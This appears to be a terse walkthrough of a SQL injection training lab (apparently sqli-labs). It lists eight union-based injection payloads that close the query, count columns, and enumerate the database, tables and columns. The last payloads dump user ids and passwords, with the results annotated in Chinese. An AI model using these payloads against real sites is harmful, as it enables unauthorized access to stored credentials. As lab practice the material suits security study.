1 2 3 4 5 6 7 8
| 1. ?id=1")--+ 2. ?id=1") order by 1--+ 3. ?id=-1") union select 1,2,3--+ 4. ?id=-1") union select 1,2,database()--+ //库名为security 5. ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ //表名 emails,referers,uagents,users 6. ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='emails' and table_schema='security'--+ //字段名 id,email_id 7. ?id=-1") union select 1,2,group_concat(id) from users--+ //1,2,3,4,5,6,7,8,9,10,11,12,14 8. ?id=-1") union select 1,2,group_concat(id,0x7e,password) from users--+ //1~Dumb,2~I-kill-you,3~p@ssword,4~crappy,5~stupidity,6~genious,7~mob!le,8~admin,9~admin1,10~admin2,11~admin3,12~dumbo,14~admin4
|